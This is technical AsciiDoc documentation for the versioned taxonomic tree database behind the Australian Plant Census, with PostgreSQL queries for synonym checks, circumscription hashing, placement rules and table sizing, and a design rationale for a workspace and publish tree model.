  JOIN name n ON el.name_id = n.id
  JOIN name_rank rank ON n.name_rank_id = rank.id
  JOIN name_type type ON n.name_type_id = type.id
  ,
  jsonb_object_keys(synonyms) AS tax_syn
WHERE tree_version_id = 144
  AND type.scientific
  AND tax_syn ILIKE 'Billardiera b%'
  AND synonyms -> tax_syn ->> 'type' = 'taxonomic synonym'
ORDER BY el.name_path;
----

|===
| name_id | simple_name | tax_syn | syn_data | rank | type | name_path
|55543|Billardiera scandens|Billardiera brachyantha|{"type": "taxonomic synonym", "name_id": 230111}|Species|scientific| Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Billardiera scandens
|55543|Billardiera scandens|Billardiera brachyantha var. brachyantha|{"type": "taxonomic synonym", "name_id": 55168}|Species|scientific|Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Billardiera scandens
|84869|Marianthus bicolor|Billardiera bicolor var. lineata|{"type": "taxonomic synonym", "name_id": 55149}|Species|scientific|Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Marianthus bicolor

|===

=== find leaf paths

[source]
.leaf-paths.sql
----
-- find leaf paths
SELECT e.tree_path AS paths
FROM tree_version_element tve
  JOIN tree_element e ON tve.tree_element_id = e.id
WHERE tve.tree_version_id = 9451356
  AND NOT exists(SELECT 1
                 FROM tree_version_element ctve
                   JOIN tree_element ce ON ctve.tree_element_id = ce.id
                 WHERE ctve.tree_version_id = 9451356 AND ce.parent_element_id = e.id)
ORDER BY e.tree_path
----

=== circumscribe a taxon at a version

This function takes a tree version id and a tree_path and gives a sha256 hash of all the leaf node child paths.
This effectively gives a comparable hash of the circumscription of this taxon, which can be used as an identifier to
compare the taxon concept.

[source]
.circumscribe.sql
----
DROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );
CREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)
  RETURNS TEXT
LANGUAGE SQL
AS
$$
SELECT encode(digest(string_agg(paths, ''), 'sha256'), 'hex')
FROM (
       SELECT e.tree_path AS paths
       FROM tree_version_element tve
         JOIN tree_element e ON tve.tree_element_id = e.id
       WHERE tve.tree_version_id = version_id
         AND e.tree_path LIKE path_match || '%'
       ORDER BY e.tree_path
     ) AS circumscription;
$$;

select circumscribe(9451356, '/9451389');
----

Or better still, using the simple sha256_agg function:

[source]
.circumscribe.sql
----
CREATE EXTENSION pgcrypto;

DROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );
CREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)
  RETURNS TEXT
LANGUAGE SQL
AS
$$
SELECT sha256_agg(paths)
FROM (
       SELECT e.tree_path AS paths
       FROM tree_version_element tve
         JOIN tree_element e ON tve.tree_element_id = e.id
       WHERE tve.tree_version_id = version_id
         AND e.tree_path LIKE path_match || '%'
       ORDER BY e.tree_path
     ) AS circumscription;
$$;
----

=== A simple md5_agg aggregate function

[source]
.md5_agg.sql
----
DROP AGGREGATE IF EXISTS md5_agg( TEXT );
DROP FUNCTION IF EXISTS md5agg_sfunc( TEXT, TEXT );
DROP FUNCTION IF EXISTS md5agg_finalfunc( TEXT );

CREATE FUNCTION md5agg_sfunc(agg_state TEXT, el TEXT)
  RETURNS TEXT
IMMUTABLE
LANGUAGE plpgsql
AS $$
DECLARE
  current_sum TEXT;
BEGIN
  -- RAISE NOTICE 'current state %', agg_state;
  current_sum := md5(coalesce(agg_state, '') || el);
  -- raise notice 'agg state %',current_sum;
  RETURN current_sum;
END;
$$;

CREATE FUNCTION md5agg_finalfunc(agg_state TEXT)
  RETURNS TEXT
IMMUTABLE
STRICT
LANGUAGE plpgsql
AS $$
BEGIN
  RETURN agg_state;
END;
$$;

CREATE AGGREGATE md5_agg ( TEXT )
(
SFUNC = md5agg_sfunc,
STYPE = TEXT,
FINALFUNC = md5agg_finalfunc
);
----

=== A simple sha256_agg function

[source]
.sha256_agg.sql
----
DROP AGGREGATE IF EXISTS sha256_agg( TEXT );
DROP FUNCTION IF EXISTS sha256agg_sfunc( TEXT, TEXT );
DROP FUNCTION IF EXISTS sha256agg_finalfunc( TEXT );

CREATE FUNCTION sha256agg_sfunc(agg_state TEXT, el TEXT)
  RETURNS TEXT
IMMUTABLE
LANGUAGE plpgsql
AS $$
DECLARE
  current_sum TEXT;
BEGIN
  -- RAISE NOTICE 'current state %', agg_state;
  current_sum := encode(digest((coalesce(agg_state, '') || el), 'sha256'), 'hex');
  -- raise notice 'agg state %',current_sum;
  RETURN current_sum;
END;
$$;

CREATE FUNCTION sha256agg_finalfunc(agg_state TEXT)
  RETURNS TEXT
IMMUTABLE
STRICT
LANGUAGE plpgsql
AS $$
BEGIN
  RETURN agg_state;
END;
$$;

CREATE AGGREGATE sha256_agg ( TEXT )
(
SFUNC = sha256agg_sfunc,
STYPE = TEXT,
FINALFUNC = sha256agg_finalfunc
);
----
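As a quick sanity check of the aggregate (a hypothetical example, assuming pgcrypto is installed as above), note that
the chained hashing is order dependent, so reversing the input order changes the result:

[source]
.sha256_agg-check.sql
----
-- Same values, different order: the two hashes should differ.
SELECT sha256_agg(x ORDER BY ord)      AS forward_hash,
       sha256_agg(x ORDER BY ord DESC) AS reverse_hash
FROM (VALUES (1, 'Plantae'), (2, 'Charophyta')) AS t(ord, x);
----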
=== To sum the total data size of the tree_element table

[source]
.sum_tree_element.sql
----
select
  pg_size_pretty(sum(pg_column_size(tree_version_id))) as tree_version_id_size,
  pg_size_pretty(sum(pg_column_size(tree_element_id))) as tree_element_id_size,
  pg_size_pretty(sum(pg_column_size(lock_version))) as lock_version_size,
  pg_size_pretty(sum(pg_column_size(display_string))) as display_string_size,
  pg_size_pretty(sum(pg_column_size(element_link))) as element_link_size,
  pg_size_pretty(sum(pg_column_size(excluded))) as excluded_size,
  pg_size_pretty(sum(pg_column_size(instance_id))) as instance_id_size,
  pg_size_pretty(sum(pg_column_size(instance_link))) as instance_link_size,
  pg_size_pretty(sum(pg_column_size(name_id))) as name_id_size,
  pg_size_pretty(sum(pg_column_size(name_link))) as name_link_size,
  pg_size_pretty(sum(pg_column_size(name_path))) as name_path_size,
  pg_size_pretty(sum(pg_column_size(names))) as names_size,
  pg_size_pretty(sum(pg_column_size(parent_version_id))) as parent_version_id_size,
  pg_size_pretty(sum(pg_column_size(parent_element_id))) as parent_element_id_size,
  pg_size_pretty(sum(pg_column_size(previous_version_id))) as previous_version_id_size,
  pg_size_pretty(sum(pg_column_size(previous_element_id))) as previous_element_id_size,
  pg_size_pretty(sum(pg_column_size(profile))) as profile_size,
  pg_size_pretty(sum(pg_column_size(rank_path))) as rank_path_size,
  pg_size_pretty(sum(pg_column_size(simple_name))) as simple_name_size,
  pg_size_pretty(sum(pg_column_size(source_element_link))) as source_element_link_size,
  pg_size_pretty(sum(pg_column_size(source_shard))) as source_shard_size,
  pg_size_pretty(sum(pg_column_size(synonyms))) as synonyms_size,
  pg_size_pretty(sum(pg_column_size(tree_path))) as tree_path_size,
  pg_size_pretty(sum(pg_column_size(updated_at))) as updated_at_size,
  pg_size_pretty(sum(pg_column_size(updated_by))) as updated_by_size
from tree_element;
----

=== To find the total used sizes of tables in the database

[source]
.table_size.sql
----
SELECT
  *,
  pg_size_pretty(total_bytes) AS total,
  pg_size_pretty(index_bytes) AS INDEX,
  pg_size_pretty(toast_bytes) AS toast,
  pg_size_pretty(table_bytes) AS TABLE
FROM (
       SELECT
         *,
         total_bytes - index_bytes - COALESCE(toast_bytes, 0) AS table_bytes
       FROM (
              SELECT
                c.oid,
                nspname AS table_schema,
                relname AS TABLE_NAME,
                c.reltuples AS row_estimate,
                pg_total_relation_size(c.oid) AS total_bytes,
                pg_indexes_size(c.oid) AS index_bytes,
                pg_total_relation_size(reltoastrelid) AS toast_bytes
              FROM pg_class c
                LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
              WHERE relkind = 'r' AND nspname = 'public'
            ) a
     ) a;
----

=== fix the depth of all elements in a tree version

[source,sql]
.update depth.sql
----
DO $$
DECLARE
  c CURSOR FOR
    SELECT tve.parent_id
    FROM tree_version_element tve
      JOIN tree ON tve.tree_version_id = tree.default_draft_tree_version_id AND tree.name = 'APC'
    ORDER BY tve.tree_path
    FOR UPDATE;
BEGIN
  FOR row IN c LOOP
    UPDATE tree_version_element
    SET depth = coalesce((SELECT depth + 1 FROM tree_version_element WHERE element_link = row.parent_id), 1)
    WHERE CURRENT OF c;
  END LOOP;
END
$$
----

This works, but sets the depth assuming the top element has the correct depth. The solution below
is better because it uses the tree_path to set the depth by counting the number of '/' chars.

[source,sql]
.update depth.sql
----
UPDATE tree_version_element
SET depth = array_length(regexp_split_to_array(tree_path, '/'), 1) - 1
WHERE tree_version_id = 50617332
AND tree_path ~ '/50617337';
----

== Placement Rules

NOTE: There is a newer, more succinct document "<<placement-rules.adoc>>" which is based directly on the new implementation
after we've tested and reviewed the results with users.
Consider this document to be the before picture and that one the after.

This is an interpretation of the results of the discussion at https://www.anbg.gov.au/ibis25/display/NSL/Tree+Monitor+Functionality
regarding the placement rules.

This is from the point of view of attempting to place an instance on a version of a tree. The version of the tree must
be consistent within these rules. We take it that an Instance == Concept == Taxon == Taxon concept. The Instance being
placed has already been chosen appropriately in an editor.

WARNING: We need to look at the difference between validating a placement before it's been placed, and validating a
whole tree that has already been created.

=== The Taxon should not already be on the tree
=== A Taxon's Name can not be in the tree as an accepted name more than once
=== The Taxon's Name Rank must be below the parent taxon's rank
=== A relationship instance can't be put on the tree
=== Polynomial names must be a child of the name parent except excluded names

e.g. Doodia caudata must be placed under Doodia

=== Hybrid names must be a child of the first hybrid name

e.g. Blechnum cartilagineum Sw. x Doodia media R.Br. must be placed under Blechnum cartilagineum

=== An accepted name can't be placed under an excluded name

All names above an accepted name must also be accepted.

=== illegal and illegitimate names *should not* be placed on the tree

This is a warning only, because there are illegitimate names used in APC where otherwise a phrase name would have to be created.

=== A Taxon's Name or Synonyms can only be in the tree once.

Checking for synonyms needs to be done from a point of view. For example with Ficus virens
(see https://biodiversity.org.au/nsl/services/search?product=APC&tree.id=1133571&name=Ficus+virens&inc._scientific=&inc.scientific=on&inc._cultivar=&inc._other=&max=100&display=apc&search=true)

Ficus virens var. sublanceolata (Miq.) Corner is a synonym of Ficus virens according to CHAH 2005, but not according to
CHAH 2016, which has them as distinct taxa (so they can both be accepted). The existing code for findSynonymOfInstance
checks if a placed instance is cited by the instance you wish to place in any reference (other relationship instance).
If you try to place Ficus virens Aiton (CHAH 2016) it will bring up the CHAH 2005 instance, which isn't relevant because
your view (sensu) is CHAH 2016.

So we should check synonymy from the point of view of the taxa being placed, and then from the already placed taxa back to the
taxa being placed, e.g. from Ficus virens var. sublanceolata.

To warn on taxonomic synonyms we need to check the name of the instance. For example, if you try to place Woodwardia Sm.
under Blechnaceae using Mueller, F.J.H. von (1882), Systematic Census of Australian Plants, which considers Doodia R.Br.
to be a synonym, but the instance of Doodia on the tree does not consider Woodwardia a taxonomic synonym, you won't see
the apparently obvious conflict in this placement because the cited instance is not on the tree. So if the instance being
placed cites a Name as being a synonym we should probably warn the user.

* relationship instances can't be placed on the accepted tree
* misapplication synonyms can be ignored.
* warn if pro parte synonyms exist elsewhere in the current tree
=== A name once on the tree should always be accounted for on the tree

A name *should* not be removed from a tree; it should be accounted for within the accepted names or synonyms.

==== Implementation within the tree

The Synonyms field in the Tree Element shows the synonym name and the type. We need to use the synonyms JSON structure to
determine if the name exists as a synonym in the context of what is on the tree currently, and that no synonyms of the taxon
being placed are on the tree.

So if we try and place 'Ficus cunninghami' we might use...

[source]
.find-synonym-of.sql
----
SELECT
  el.name_id,
  el.simple_name,
  tax_syn,
  synonyms ->> tax_syn,
  el.names,
  el.name_path
FROM tree_element el
  JOIN name n ON el.name_id = n.id,
  jsonb_object_keys(synonyms) AS tax_syn
WHERE tree_version_id = 146
  AND el.names LIKE '%|Ficus cunninghami|%'
  AND synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte).*'
  AND tax_syn = 'Ficus cunninghami'
----

This takes around 60-70ms to find Ficus virens. Note the LIKE on el.names limits the search quickly before using the slower
jsonb queries, and is quicker than the equivalent regex.

[source]
.explain
----
Nested Loop (cost=0.98..127531.08 rows=3 width=342)
  -> Nested Loop (cost=0.98..127525.04 rows=3 width=310)
    -> Index Scan using tree_element_pkey on tree_element el (cost=0.56..127511.69 rows=3 width=310)
         Index Cond: (tree_version_id = 146)
         Filter: (names ~~ '%|Ficus cunninghami|%'::text)
    -> Index Only Scan using name_pkey on name n (cost=0.42..4.44 rows=1 width=8)
         Index Cond: (id = el.name_id)
  -> Function Scan on jsonb_object_keys tax_syn (cost=0.00..2.00 rows=1 width=32)
       Filter: ((tax_syn = 'Ficus cunninghami'::text) AND (((el.synonyms -> tax_syn) ->> 'type'::text) !~ '.*(misapp|pro parte).*'::text))
----

If we repeat that search for all the names in the el.names string for the name we're trying to place, then we will have
found all matching names both ways.

So, for example, we can find all the clashing synonyms for an instance using:

[source]
.find_synonyms
----
SELECT
  el.name_id,
  el.simple_name,
  tax_syn,
  synonyms -> tax_syn ->> 'type' AS syn_type,
  synonyms -> tax_syn ->> 'name_id' AS syn_id
FROM tree_element el
  JOIN name n ON el.name_id = n.id,
  jsonb_object_keys(synonyms) AS tax_syn
WHERE tree_version_id = 146
  AND synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte).*'
  AND tax_syn IN (SELECT synonym.simple_name AS sn
                  FROM Instance s
                    JOIN instance_type it ON s.instance_type_id = it.id,
                    Name synonym
                  WHERE s.cited_by_id = :instance_id_to_place
                    AND synonym.id = s.name_id
                    AND it.misapplied = FALSE
                    AND it.pro_parte = FALSE
);
----

Using the above, if we try to place Ficus virens var. sublanceolata sensu Jacobs & Packard (1981), Plants of NSW
(instance 692695), we get the results:

|===
|name_id|simple_name|tax_syn|syn_type|syn_id

|75398|Ficus virens|Ficus cunninghamii|taxonomic synonym|90744
|75398|Ficus virens|Ficus infectoria var. cunninghamii|taxonomic synonym|91343
|===

==== Checking the validity of an existing tree

Check all names in the tree for synonyms of that name in the tree:
(See https://www.anbg.gov.au/25jira/browse/NSL-2484)

[source]
.findSynonyms in tree
----
-- updated for tree_version_element join table
SELECT
  e1.simple_name AS name1,
  e1.name_id,
  e2.simple_name AS name2,
  e2.name_id,
  tax_syn AS name2_synonym,
  e2.synonyms -> tax_syn ->> 'type' AS type
FROM tree t,
  tree_version_element tve1
  JOIN tree_element e1 ON tve1.tree_element_id = e1.id
  ,
  tree_version_element tve2
  JOIN tree_element e2 ON tve2.tree_element_id = e2.id
  ,
  jsonb_object_keys(e2.synonyms) AS tax_syn
WHERE t.name = 'APC'
  AND tve1.tree_version_id = t.current_tree_version_id
  AND tve2.tree_version_id = t.current_tree_version_id
  AND tve2.tree_element_id <> tve1.tree_element_id
  AND e1.excluded = FALSE
  AND e2.excluded = FALSE
  AND e2.synonyms IS NOT NULL
  AND (e2.synonyms -> tax_syn ->> 'name_id') :: BIGINT = e1.name_id
  AND e2.synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte|common).*';
----

NOTE: We've used the current APC tree above.

== Running the migration

The services will run a migration script on startup which will alter the DDL, adding tables and indexes. It will then
migrate all the nodes and versions over, as well as setting the family of the names. It will use the preferred host from
the mapper to set the links in the tree_element and tree_version_element tables, which means we probably have to manually
do this for the moss and lichen shards.

WARNING: *BEFORE you run the services/upgrade script make sure the preferred host is set correctly if you're running it locally
or in test.*

After the upgrade script has run we need to run the "tree-element-mapper-links.sql" script to add all the mapper links.

NOTE: We need to delete from the notification table due to all the changes to name.

= New tree structure
v1.0, June 2017
:imagesdir: resources/images/
:toc: left
:toclevels: 4
:toc-class: toc2
:icons: font
:iconfont-cdn: //cdnjs.cloudflare.com/ajax/libs/font-awesome/4.3.0/css/font-awesome.min.css
:stylesdir: resources/style/
:stylesheet: asciidoctor.css
:description: New tree structure documentation
:keywords: documentation, NSL, APNI, API, APC, tree
:links:
:numbered:

The current tree structure is overly complicated and difficult to validate and maintain going forward. The reasons for this
are many, but basically come down to a changing understanding of requirements.

I propose to scale back and simplify the structure used to store the trees and to only implement what is currently required,
then evolve the implementation as needed.

The main change in requirements is the idea of using a workspace, or draft tree, to do work. The workspace would then be
published as a new version. Once a version is published it is immutable _except_ for minor typographical changes as determined
by policy.

IMPORTANT: This work is designed to make the tree easy to understand and reason about, and therefore make it easier to
change and maintain over time, and improve performance.

== Requirements

=== Major requirements:

 . The tree must store and display the parent-child taxonomic relationship between names.
 . The tree must be versioned so that a citation (id) of a tree element must reproduce the tree as it was when it was
 viewed.
 . A link to an element on the tree should be able to identify the version of the tree and reproduce that version.
 . You should be able to link to a _version_ of the tree and get the current tree easily.
 .. You should be able to compare taxa in different versions via an identifier. The identifier is unique to the _circumscribed_
 or enclosed taxa below this taxon. This identifier spans multiple versions of a tree. See <<taxon identifiers>>
 . The tree must enforce strict rules about the placement of names on a tree.
 . Profile data including only Comment and Distribution data is to be stored in the tree structure.
 . Tree elements are pointers to an Instance as a representation of a Taxon Concept.
 . Tree elements can represent Accepted and Excluded items which need to be distinguished. This appears to be accepted
 and not accepted, but treated. The "Excluded" is a covering term for a number of reasons these names are not accepted
 (e.g. doubtful) but the distinction is not required. As such, for now we can just indicate an element is Accepted or Not.
 . Easy to work with a version of the tree.
 . All common operations must be fast. You should be able to query the status of a name on the current tree without
 noticeable delay.
 . Editors should be able to work on a draft version of the tree without it being public, then publish it at a time of
 their choosing.
 . Versions should be released as a unit of work, collecting a set of changes together (policy).
 . The users need to be able to add a log entry describing the work done and referencing the documents that led to the changes.
 . Multiple workspaces that can be merged over different time frames are a requirement.
 . It would be nice to be able to list and view older versions of the tree and see what changed (diffing).
 . It would be nice to be able to archive older versions of the tree without breaking it.
 . We want to access the trees through RDF.

==== Uber trees

 . We must be able to create an "uber tree" from multiple sub trees.
 . The uber tree should be able to merge sub trees from multiple points - for example lichens have multiple connections
 to the fungi tree.
 . Uber tree elements need to link back to source tree nodes if compositional.

According to https://www.environment.gov.au/science/abrs/publications/other/numbers-living-species/executive-summary[ABRS Numbers of Living Species in Australia and the World]
there are ~2 million species in the world that we should aim to handle in an uber tree.

==== Use cases

 . Creation of accepted taxonomic trees with strict hierarchical placement rules within a shard.
 . Creation of a list of taxon concepts commonly (only) from family down, known as a checklist, from one or more shards.
 These trees may have more relaxed placement rules.
 . Creation of composite (uber) trees made from multiple sub trees, such as accepted taxonomic trees from multiple shards.

WARNING: We should take a closer look at the needs of List compilers and Tree composers to see if the difference in the
 set of requirements leads to different solutions for each.

==== Editors

Based on the above use cases, and current editor usage, it looks like we need two different editing pathways for trees.

 . In instance editor tree editing: where the advanced editor can create specific taxonomic concepts for accepted trees
 in accordance with some authority such as CHAH.
 . A composition editor that can compose multiple trees into an uber tree, or create a checklist.
This doesn't require the
 ability to edit instances, just to choose concepts, or other tree elements/sections.

Perhaps the second, compositional, editor is logically broken into an uber tree manager and a checklist editor.

==== Search

We need to clearly define the difference between the search on names (the APNI search) and the search requirements on
trees. At the moment there is confusion because some searches in the advanced search mix tree and name concerns.

NOTE: Greg W. put this view forward too.

===== use cases

 . Search a tree for names under a name and bring back the results displaying the APNI or APC format output:
 * search synonyms or accepted only
 * search based on native, naturalised, distribution or profile data.
 * further advanced filtering based on name/instance type, tags, author etc.
 . Search for names independent of any tree and display in APNI format - this may be an advanced search on name types,
 tags, instance types, and may require knowledge of the Family.
 . Name check - a specific check against the accepted tree in a shard.
 . Check to see if a taxon is the same as another taxon, i.e. encloses the same sub taxa, via comparison of a taxon identifier.

===== implementation (discussion)

Tree searches should be associated with the tree they are on, because a tree may be separated from the name and instance
data it is pointing at. In the case of the uber trees they may be pointing to multiple shards.

Since trees contain the name and instance id, but not instance data, a tree search may bring back a list of names that can
in turn fetch APNI or APC format data via the existing service API (much like the existing service search).

If we want to implement a more closely coupled database implementation in the search, we could link to multiple shard databases
to get the data. *I prefer the previous solution as it allows fully autonomous trees and lists to exist that just use
linked data.* However speed will need to be taken into account when looking at this, which means looking at whether the service
APIs need improving or the solution is limited to direct database connections.

We need to carefully consider what is offered in search and how you discover what can be searched... initially of course
we are publicly offering only the APC as a cross shard search, and then moving up to NSL including AFD.

Trees that are linked to a shard, e.g. the Vascular APC tree, that have a database relationship to the name and instance
data in the shard can take advantage of joins for more complex queries.

Cross shard searching in general needs an API approach, where an API (which could be just a database connection) is used
to collect data, then a map/reduce/sort approach is used to filter and sort results. The name paths and sort names will
help in collating and sorting results from multiple sources.

See https://www.anbg.gov.au/25jira/browse/NSL-2412[NSL-2412]

After discussion with Greg Whitbread, and following from user feedback and experience, the use of the name tree search may
be a reflection of the way we use the "product" concept, and of how the sets of data can be used and what
they should be used for.

At the moment we try and describe this in the APNI and APC product descriptions.

APNI
****
The Australian Plant Name Index (APNI) is a tool for the botanical community that deals with plant names and their usage
in the scientific literature, whether as a current name or synonym.
APNI does not recommend any particular taxonomy or
nomenclature. For a listing of currently accepted scientific names for the Australian vascular flora, please use the
Australian Plant Census (APC) link above.
****

APC
****
The Australian Plant Census (APC) is a list of the accepted scientific names for the Australian vascular flora, ferns,
gymnosperms, hornworts and liverworts, both native and introduced, and includes synonyms and misapplications for these
names. The APC covers all published scientific plant names used in an Australian context in the taxonomic literature,
but excludes taxa known only from cultivation in Australia. The taxonomy and nomenclature adopted for the APC are endorsed
by the Council of Heads of Australasian Herbaria (CHAH).
****

As Greg points out though, we don't limit the search, because people are asking "within" questions from APNI. This
question comes about because scientific names intrinsically, but unreliably, describe or imply rank and hierarchy
information, except where they don't.

It seems to me that we need to explicitly combine the name and taxonomy searches and express clearly what it is the
user is asking: for example "what is in the family Fabaceae according to Maberly" or "what is in the family Fabaceae
according to APC", and then we can do useful things like "compare the family Fabaceae according to Maberly and APC".

By combining we can ask questions like "What is not in APC but is in Maberly", so long as we can emphasize the context
of the APNI/NSL dataset.

=== Change over requirements:

 . We must maintain existing links to trees (APC) that have been used prior to this change. This means any links to
 existing nodes must resolve to the same instance data and position in the tree structure. The intrinsic data should not
 change, though extraneous data may be left out (broken links, some RDF identifiers that didn't lead to real data).
 . Editing the tree should work and be possible from the point of change over.

== Concept

The concept for the new structure is to remove the need for link objects and simply copy the list of tree elements for
each version of the tree. The Workspace is then a copy of the current tree that is then altered. When the workspace is
ready it is published as the latest version of the tree by making it the current version. A copy of the current version
is then made to create the new workspace version.

We track changes in the tree by maintaining a previous link that points to the tree_element in the previous version.

Versions are grouped by a tree_version which is associated with a tree. Tree_elements are associated with a tree_version
via a linking tree_version_element table.

 Tree <- [Tree_Versions]<-[Tree_Version_Elements]<- [Tree_Elements]

The tree holds a pointer to the current tree version and a default workspace version. Tree_version_element is a join table between tree
versions and tree elements, and is the versioned object for a tree_element. This structure reduces duplication of data on
copying a tree, and holds a unique versioned identifier for an element in a tree.

This concept is storage efficient and simple. Excessive numbers of versions could create a lot of copied
tree version elements, but the workspace/publish model may also lead to a more structured release of versions
(e.g. once a day/week/month) instead of on-the-fly changes.

=== User concept

Versions of a tree are Publications that can be referenced or cited. You can cite a published tree (version) using an
identifier for the _tree_version_ or using an identifier for a _tree_version_element_. This will return the element and
the entire tree in the context of the published tree.
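For example, resolving a cited _tree_version_element_ identifier back to its element and version could look something
like the sketch below (the element link URL is illustrative only, following the tree/version/element link scheme):

[source]
.resolve-citation-sketch.sql
----
-- Resolve a cited element link to the versioned element it identifies.
SELECT tve.tree_version_id, te.simple_name, tve.name_path
FROM tree_version_element tve
  JOIN tree_element te ON te.id = tve.tree_element_id
WHERE tve.element_link = 'https://id.biodiversity.org.au/tree/137/7845073';
----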
==== taxon identifiers

Each tree_version_element also has an associated _taxon identifier_ which identifies the concept of the taxon in terms of
the data, including the circumscription of the taxon (i.e. the taxa under this taxon). The taxon identifier can be used to
compare a taxon between versions, i.e. see if the concept has changed.

The definition of a taxon for determining if it has changed is:

* A taxon consists of the Name, its Instance and its children. An Instance defines the usage of the Name in a
reference and its Synonymy.
* A taxon does *not* include the status (Excluded from this classification) or the Profile data (Comments and Distribution),
which are part of the classification as published.

A taxon will exist in many publications (versions) of a tree, so the distribution, comments and status may change over
the publications.

NOTE: See <<Existing links,Existing links>> for resolving taxon identifiers.

=== Autonomous trees

Trees should be able to be autonomous from the shards. This means that database foreign keys to names and instances are
not enforced (i.e. no direct FK relationship). This means we need to rely on the link to identify the instances. It also
means that we want to copy the data required to ask questions of the tree into the tree structure as much as possible.

Whilst we will rely on the link to reference the data in the shards, we will store the instance and name id (as a Long),
which means also that we need to store the source shard for the instance and name. If a placed name later becomes
de-duplicated we may have to update the id by using the mapper (rare).

=== Data usage vs speed

Copying the tree for every version is less space efficient than the current model, but affords many benefits. At the
current size of the APC tree, 35k tree_elements are required for each copy.

NOTE: These are updated usage figures after spiking and importing actual data; the old guesstimate has been removed.

After doing the spike and adding in all the additional data to make the trees autonomous we can compare actual data sizes.
These have been updated with the version join table instead of simple copies.

In APNI:

|===
| table | total size including indexes

| tree_node
| 284MB (inc 224MB index)

| tree_event
| 1328MB (inc 248kB index)

| tree_link
| 1434MB (inc 693MB index)

| tree_element (152 versions)
| 263MB (inc 95MB index)

| tree_version_element (5.5M)
| 4088MB (inc 2564MB index)
|===

which makes the new tree structure not much larger than the old one.

NOTE: Prior to implementing the join table for version/element, the tree_element table was consuming ~40GB of data for 150
versions. The totals of table columns didn't add up to this amount, but there was something else the DB was doing to
use this space.

==== Tree_Version_element "link table"

Instead of copying the tree_elements each time, we just need to keep a link table of elements to tree versions, making
a many-to-many relationship. This adds a little complexity when archiving off older versions of trees, but at the same
time will reduce the need to archive.

The link table means that tree elements that don't change do not need to be copied.
To copy a tree to draft is a matter
of adding the link table rows. New elements only participate in new trees.

This means we don't need to use a composite key for tree elements; we just use the element_id, which can become the id.

The reason why we didn't initially do this was that the old tree changes the parent node quite often, based on something
else changing on this or another branch. But... the changing parent doesn't mean something changed above that node, though
there *may* have been a placement change.

If the parent of a node does actually change in some material way we need to insert a new tree_element at the point where
the change happens. *This is not easy.*

A simpler compromise for this is to only create a new tree_element when the parent changes. This will still replicate a
lot of redundant data.

The diagram below demonstrates the problem. Nodes 5, 6, 7 have not changed; they have been added so that the tree from 5
down shows the addition of node 8. Node 3 is in both trees, it just has two parent links. We just want to have a version
(say v2) point to 1, 2, 3, 4, 8. For two versions we could accomplish this (if nothing above 8 changes) by using the previous
node link, but if you look at nodes 9, 10 and 11 it gets trickier to do.

image::multi-parent-node.svg[]

What we need to do is compare the data in the nodes to check the parentage; in particular we need to check the instance
path of the node. So for each daily version we create a tree based on instance path, where we have a unique tree_element
for each instance path. We then map the tree_elements to a version.

. For each top node (daily) recurse down the tree creating a table of:
  [instance path id], instance path, node id, instance id, name id, parent instance path id, version number.
. Group by instance_path, aggregate version numbers, aggregate node_ids (sketched below).
. Generate new tree elements for each instance path, using the parent instance path to set the parent tree_element.
. Add the tree elements to versions.
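A rough sketch of the grouping step, with a hypothetical walked_nodes staging table built by the recursive walk in
step 1 (the real migration code differs):

[source]
.migration-grouping-sketch.sql
----
-- Collapse walked nodes that share an instance path into one row per unique
-- instance path, remembering the versions and node ids it covers.
SELECT instance_path,
       parent_instance_path_id,
       array_agg(DISTINCT node_id)        AS node_ids,
       array_agg(DISTINCT version_number) AS versions
FROM walked_nodes
GROUP BY instance_path, parent_instance_path_id;
----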
add tree elements to versions\n\n\n==== Finding sizes\n\n[source]\n.table-size.sql\n----\nSELECT\n *,\n pg_size_pretty(total_bytes) AS total,\n pg_size_pretty(index_bytes) AS INDEX,\n pg_size_pretty(toast_bytes) AS toast,\n pg_size_pretty(table_bytes) AS TABLE\nFROM (\n SELECT\n *,\n total_bytes - index_bytes - COALESCE(toast_bytes, 0) AS table_bytes\n FROM (\n SELECT\n c.oid,\n nspname AS table_schema,\n relname AS TABLE_NAME,\n c.reltuples AS row_estimate,\n pg_total_relation_size(c.oid) AS total_bytes,\n pg_indexes_size(c.oid) AS index_bytes,\n pg_total_relation_size(reltoastrelid) AS toast_bytes\n FROM pg_class c\n LEFT JOIN pg_namespace n ON n.oid = c.relnamespace\n WHERE relkind = 'r'\n ) a\n ) a;\n----\n\nNOTE: The new data structure allows us to partition and archive older versions should we need to.\n\nCopying the 35k tree_elements to a workspace takes about 12.8 seconds, *however we only need to add join table\nrows to make a copy* which is much quicker, 850ms.\n\n insert into tree_version_tree_elements (tree_version_id, tree_element_id)\n SELECT 9703722, tree_element_id from tree_version_tree_elements where tree_version_id = 152;\n\n\n===== VM info:\n appsint1 24GB RAM (18GB used) 50GB space with ~27GB free for tomcat\n pgsql-prod1-ibis.it.csiro.au 6GB RAM (5GB used)\n \/dev\/mapper\/vg_data-lv_data 50G 981M 50G 2% \/pg_data\n \/dev\/mapper\/vg_back-lv_back 100G 16G 85G 16% \/pg_back\n \/dev\/mapper\/vg_tbl1-lv_tbl1 100G 8.3G 92G 9% \/pg_tbl1\n \/dev\/mapper\/vg_xlog-lv_xlog 20G 257M 20G 2% \/pg_xlog\n\n=== Multiple workspaces\n\nBecause a workspace is just a copy of a version of the tree with pointers to the previous version of it's tree_elements,\nwe can implement a merge of the latest tree or a version (like a branch in GIT). A workspace or draft version of the tree\nwould reference the version it is a copy of and when you go to publish it, we check that the version of the current\ntree has not changed. If it has you would need to merge the current version of the tree with your draft version. Where\nthere are conflicts, i.e. the current version has changed a tree_element that you have also changed you need to resolve\nthe conflict by either accepting the current version, overwriting the current version with yours, or somehow merging the\nchanges. The workflow for a merge of conflicting changes is the trickiest bit.\n\nWhere different workspaces are working in different branches of the tree auto merging would be possible.\n\nMultiple workspaces would make long running projects more feasible, e.g. adding a branch of orchids as a single update.\n\nTalking to the current APC editors they considered the ability to have multiple workspaces and merging as something that\n\"was always a requirement, really\"\n\n=== 